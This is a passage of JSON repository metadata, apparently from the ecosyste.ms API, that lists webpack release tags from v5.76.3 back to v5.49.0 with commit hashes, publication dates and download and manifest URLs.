06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","d